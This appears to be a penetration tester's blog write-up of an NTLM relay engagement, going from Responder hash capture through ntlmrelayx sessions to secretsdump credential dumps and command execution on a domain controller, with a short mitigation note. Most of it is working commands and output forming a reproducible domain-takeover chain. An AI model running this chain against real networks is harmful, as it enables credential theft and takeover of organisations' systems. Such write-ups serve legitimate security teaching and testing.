NTLM Relay to Domain Admin

5 minute read

Short post outlining a technique used on a recent engagement where I was tasked with gaining domain admin privs starting from an unauthenticated standpoint.

NTLM Relay to Domain Admin

Responder is often used on black box/red team engagements to capture and poison LLMNR and NBT-NS communications and it’s fairly common to capture standard user or administrator hashes. This post aims to outline how you can take advantage of captured hashes without having to spend time attempting to crack them and how compromising one account can lead to full domain control.

NTLM Relay

This attack allows us to relay the hashes captured with Responder to hosts within the environment that have SMB signing disabled and then save the authenticated session if the captured credentials have the necessary privileges to access the vulnerable hosts. If successful we can then access all of the machines the captured hashes can access (with the same privileges of that account). The combination of legacy protocols and the lack of SMB signing allows us to carry out this attack.

A couple of minor alterations are required to the /etc/responder/Responder.conf file shown below:

[Responder Core]

; Servers to start
SQL = On
SMB = Off  // Off instead of On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off  // Off instead of On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On

CrackMapExec can be used to create a list of hosts within the environment with SMB signing disabled:

# crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# wc -l targets.txt
39 targets.txt

The 39 hosts within the targets.txt file will be attacked using the captured credentials. With the changes made and the targets identified you’ll then need to run the following two commands in separate terminals:

# responder -I eth1 -r -d -w

# impacket-ntlmrelayx -tf targets.txt -smb2support -debug -socks

You’ll want to let these commands run for while so they have time to gather and relay the captured hashes, after a while if you run the socks command at the ntlmrelayx prompt you’ll get a list of all the authenticated sessions you can take advantage of. In this instance the “alice_admin“ account was DA so we essentially have DA access to all of the machines displayed below (if one of those machines is the DC it’s pretty much game over):

ntlmrelayx> socks
Protocol  Target         Username         AdminStatus  Port 
--------  -------- 	 --------         --------     ------
SMB       192.168.1.9    DOM/alice_admin  TRUE         445  
SMB       192.168.1.16   DOM/alice_admin  TRUE         445  
SMB       192.168.1.17   DOM/alice_admin  TRUE         445  
SMB       192.168.1.13   DOM/alice_admin  TRUE         445  
SMB       192.168.1.31   DOM/alice_admin  TRUE         445  
SMB       192.168.1.29   DOM/alice_admin  TRUE         445  
SMB       192.168.1.18   DOM/alice_admin  TRUE         445  
SMB       192.168.1.19   DOM/alice_admin  TRUE         445  
SMB       192.168.1.22   DOM/alice_admin  TRUE         445  
SMB       192.168.1.5    DOM/alice_admin  TRUE         445  
SMB       192.168.1.42   DOM/alice_admin  TRUE         445  
SMB       192.168.1.6    DOM/alice_admin  TRUE         445  
SMB       192.168.1.2    DOM/alice_admin  TRUE         445  
SMB       192.168.1.24   DOM/alice_admin  TRUE         445  
SMB       192.168.1.7    DOM/alice_admin  TRUE         445  
SMB       192.168.1.21   DOM/alice_admin  TRUE         445  
SMB       192.168.1.28   DOM/alice_admin  TRUE         445  
SMB       192.168.1.41   DOM/alice_admin  TRUE         445  
SMB       192.168.1.30   DOM/alice_admin  TRUE         445  
SMB       192.168.1.4    DOM/alice_admin  TRUE         445  
SMB       192.168.1.53   DOM/alice_admin  TRUE         445  
SMB       192.168.1.57   DOM/alice_admin  TRUE         445  
SMB       192.168.1.99   DOM/alice_admin  TRUE         445  
SMB       192.168.1.94   DOM/alice_admin  TRUE         445  
SMB       192.168.1.33   DOM/alice_admin  TRUE         445  
SMB       192.168.1.25   DOM/alice_admin  TRUE         445  
SMB       192.168.1.11   DOM/alice_admin  TRUE         445  
SMB       192.168.1.34   DOM/alice_admin  TRUE         445  
SMB       192.168.1.68   DOM/alice_admin  TRUE         445  
SMB       192.168.1.12   DOM/alice_admin  TRUE         445  
SMB       192.168.1.248  DOM/alice_admin  TRUE         445  
SMB       192.168.1.247  DOM/alice_admin  TRUE         445  
SMB       192.168.1.210  DOM/alice_admin  TRUE         445  

You’ll have to ensure your /etc/proxychains4.conf file is configured to use the default port 1080 for ntlmrelayx socks functionality:

[ProxyList]
socks4  127.0.0.1 1080

Once that’s done you can use Impacket’s smbclient to access a host’s file system:

# proxychains4 impacket-smbclient DOM/alice_admin@192.168.1.41
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: // press Enter at the password prompt or use -no-pass
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.1.41:445  ...  OK
Type help for list of commands
# shares
ADMIN$
C$
E$
IPC$
print$
# use C$
# ls
drw-rw-rw-          0  Wed Nov  6 09:12:54 2019 $Recycle.Bin
-rw-rw-rw-     389332  Mon Sep 16 15:46:21 2019 bootmgr
-rw-rw-rw-          1  Mon Sep 16 15:46:21 2019 BOOTNXT
drw-rw-rw-          0  Mon Sep 16 06:50:39 2019 Documents and Settings
drw-rw-rw-          0  Thu Sep 19 08:32:22 2019 inetpub
-rw-rw-rw- 14495514624  Fri Sep 17 13:34:14 2021 pagefile.sys
drw-rw-rw-          0  Mon Sep 16 12:46:08 2019 PerfLogs
drw-rw-rw-          0  Mon Apr 20 12:31:59 2020 Program Files
drw-rw-rw-          0  Thu Sep 19 17:17:48 2019 Program Files (x86)
drw-rw-rw-          0  Sat Mar 13 09:31:37 2021 ProgramData
drw-rw-rw-          0  Mon Sep 16 06:50:43 2019 Recovery
drw-rw-rw-          0  Sun Sep 19 16:00:28 2021 System Volume Information
drw-rw-rw-          0  Wed Nov  6 14:52:47 2019 Users
drw-rw-rw-          0  Fri Sep 17 12:49:38 2021 Windows

As the relayed account is DA we can just run secretsdump to dump the SAM and LSA secrets from all of the hosts we have sessions for, one host contained the plaintext credentials for another DA account:

# proxychains4 impacket-secretsdump DOM/alice_admin@192.168.1.4 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: // press Enter at the password prompt or use -no-pass
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.1.4:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
<snipped>
[*] _SC_SQLTELEMETRY$EXP 
DOM\bob_admin:bob_admin_password

The “bob_admin“ DA account plaintext creds could then be used to authenticate and dump the NTDS.DIT database from DC02 and the primary DA account “dom_admin“ was found in the output:

# impacket-secretsdump DOM/bob_admin@192.168.1.8
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: bob_admin_password
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
<snipped>
[*] Using the DRSUAPI method to get NTDS.DIT secrets
<snipped>
DOM\dom_admin:CLEARTEXT:dom_admin_password

The “dom_admin” account could then authenticate to DC01 and that ended the engagement:

# crackmapexec smb 192.168.1.10 -u dom_admin -p dom_admin_password -x whoami
SMB         192.168.1.10    445    DC01             [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC01) (domain:acw.intranet) (signing:True) (SMBv1:True)
SMB         192.168.1.10    445    DC01             [+] DOM\domadmin:domadmin_password (Pwn3d!)
SMB         192.168.1.10    445    DC01             [+] Executed command 
SMB         192.168.1.10    445    DC01             DOM\dom_admin

Conclusion

Coming across a DA account with Responder makes this a lot easier but it should be noted that attack paths do exist from standard user accounts, however you will be limited to the privileges and access rights of that user which will impact what tools you’re able to use from Impacket.

This attack can be prevented by disabling and preventing the use of legacy protocols such as LLMNR and NBT-NS, and enforcing SMB signing for hosts within the environment.